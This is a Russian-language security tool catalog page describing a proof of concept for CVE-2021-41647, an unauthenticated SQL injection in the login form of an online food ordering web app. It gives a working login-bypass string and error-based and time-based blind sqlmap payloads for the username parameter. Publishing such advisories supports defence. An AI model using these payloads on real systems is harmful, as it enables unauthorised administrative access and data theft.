Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-41647 — Доказательство концепции эксплуатации неаутентифицированной SQL-инъекции в Online-Food-Ordering-Web-App, демонстрирующее обход аутентификации и методы слепой инъекции на основе ошибок и времени. | Kitploit
Инструменты/GitHubGitHub/mobiusbinary/cve-2021-41647
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на ПроникновениеОбучение и Образование
GitHubmobiusbinary/cve-2021-41647

CVE-2021-41647

Доказательство концепции эксплуатации неаутентифицированной SQL-инъекции в Online-Food-Ordering-Web-App, демонстрирующее обход аутентификации и методы слепой инъекции на основе ошибок и времени.

Репозиторий
14 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-41647

CVE-2021-41647 SQL-инъекция в Online-Food-Ordering-Web-App

Online-Food-Ordering-Web-App уязвима к неаутентифицированным атакам с использованием ошибок и time-based blind SQL-инъекций. Параметр username на странице /login.php не санитизирует пользовательский ввод, поэтому атакующий может обойти вход в систему с помощью простой техники обхода.

Ссылка на приложение

Online-Food-Ordering-Web-App

Затронутые компоненты и параметр

URL: /login.php
ПАРАМЕТР: username

POC

ПОЛЕЗНАЯ НАГРУЗКА ДЛЯ ОБХОДА ВХОДА

Чтобы обойти вход пользователя и получить полный административный доступ, введите в поле username следующую полезную нагрузку: user' or 1=1-- -

ПОЛЕЗНЫЕ НАГРУЗКИ SQLMAP

Parameter: username (POST Request) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: username=test'||(SELECT 0x6d65686d WHERE 8694=8694 AND (SELECT 8639 FROM(SELECT COUNT(*),CONCAT(0x71626a7a71,(SELECT (ELT(8639=8639,1))),0x71766a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&password=asdfasdrf

Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=test'||(SELECT 0x6d6d6367 WHERE 7580=7580 AND (SELECT 4416 FROM (SELECT(SLEEP(5)))nUhT))||'&password=asdfasdrf

Если изображение POC нечёткое, нажмите на GIF — оно загрузится в лучшем разрешении.

POC

Обнаружено

Jason Colyvas
MOBIUSBINARY
20 сентября 2021 года

Скачать инструмент